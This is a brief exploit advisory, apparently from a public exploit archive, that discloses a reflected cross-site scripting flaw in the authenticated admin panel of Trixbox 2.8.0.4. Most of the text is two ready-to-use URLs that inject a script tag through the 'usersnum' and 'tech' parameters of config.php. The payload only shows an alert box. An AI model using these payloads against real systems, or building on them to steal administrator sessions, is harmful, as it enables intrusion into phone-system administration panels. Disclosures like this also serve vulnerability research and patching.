Exploit Title: Trixbox 2.8.0.4 XSS Exploit
Date: 07/04/2014
Exploit Author: Daniel Moreno (a.k.a W1ckerMan)
Vendor Homepage: http://sourceforge.net/projects/asteriskathome/
Version: 2.8.0.4


This exploit needs authentication

http://IP/admin/config.php?display=recordings&usersnum=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E

http://IP/admin/config.php?display=trunks&tech=%22%3E%3Cscript%3Ealert%28%22123%22%29%3C/script%3E


Thanx,
Daniel Henrique Negri Moreno (a.k.a W1ckerMan)